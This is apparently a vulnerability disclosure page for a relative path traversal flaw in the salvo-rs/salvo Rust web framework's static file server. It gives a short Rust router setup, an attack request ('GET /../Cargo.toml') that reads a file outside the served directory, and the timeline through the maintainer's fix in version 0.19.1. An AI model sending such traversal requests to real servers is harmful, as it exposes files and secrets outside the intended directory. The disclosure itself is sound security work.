Relative Path Traversal vulnerability in StaticDir server in salvo-rs/salvo


Reported on

Apr 17th 2022


There is a relative path traversal vulnerability in the serve module of the extra crate. An attacker can simply request a relative path and access files outside of the configured directory root.

Proof of Concept

With a static folder in the project directory:

use salvo::extra::serve::{Options, StaticDir};
use salvo::prelude::*;

async fn main() {
    let router = Router::with_path("<**path>")
        .get(StaticDir::width_options(vec!["static"], Options::default()));


Example attack request:

GET /../Cargo.toml HTTP/1.1
Host: localhost

This serves the Cargo.toml file in the project directory, which is outside the static directory.


This vulnerability is capable of accessing any file on a server running Salvo.

We are processing your report and will contact the salvo-rs/salvo team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the salvo-rs/salvo team and are waiting to hear back a year ago
salvo-rs/salvo maintainer
a year ago

Tanks for your work, I have published a new version to fix this issue.

salvo-rs/salvo maintainer validated this vulnerability a year ago
William Henderson has been awarded the disclosure bounty
The fix bounty is now up for grabs
salvo-rs/salvo maintainer marked this as fixed in 0.19.1 with commit 54815c a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation